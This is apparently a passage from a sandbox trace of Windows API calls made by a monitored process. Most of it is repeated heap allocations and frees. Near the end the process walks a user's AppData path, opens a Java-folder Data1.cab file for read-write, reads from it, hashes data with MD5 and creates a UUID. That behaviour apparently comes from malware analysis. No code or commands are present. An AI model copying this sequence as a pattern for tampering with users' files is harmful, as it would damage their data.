(HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.343] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\") returned="jre1.7.0_45\\" [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.343] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0098.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0098.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0098.344] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0098.344] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0098.344] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0098.344] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.344] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.344] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.344] PathFindFileNameW (pszPath="") returned="" [0098.345] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned=".cab" [0098.345] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0098.349] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=25340970) returned 1 [0098.350] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0098.355] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x182ac04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.355] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0098.361] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0098.362] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0098.362] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.362] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0098.386] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0098.386] GetLastError () returned 0x0 [0098.386] CryptDestroyHash (hHash=0x31c7580) returned 1 [0098.386] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0098.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.387] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0098.387] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0098.387] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.387] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0098.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.387] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.387] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25810) returned 0x9a06a00 [0098.388] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0098.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0098.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0098.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbe78 [0098.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5120 [0098.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbec0 [0098.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5138 [0098.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5168 [0098.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5180 [0098.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0098.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0098.389] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0098.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0098.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5168 | out: hHeap=0x680000) returned 1 [0098.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5180 | out: hHeap=0x680000) returned 1 [0098.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0098.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5180 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5168 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0098.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5180 | out: hHeap=0x680000) returned 1 [0098.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5168 | out: hHeap=0x680000) returned 1 [0098.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.391] HeapFree (in: hHeap=0x680000, 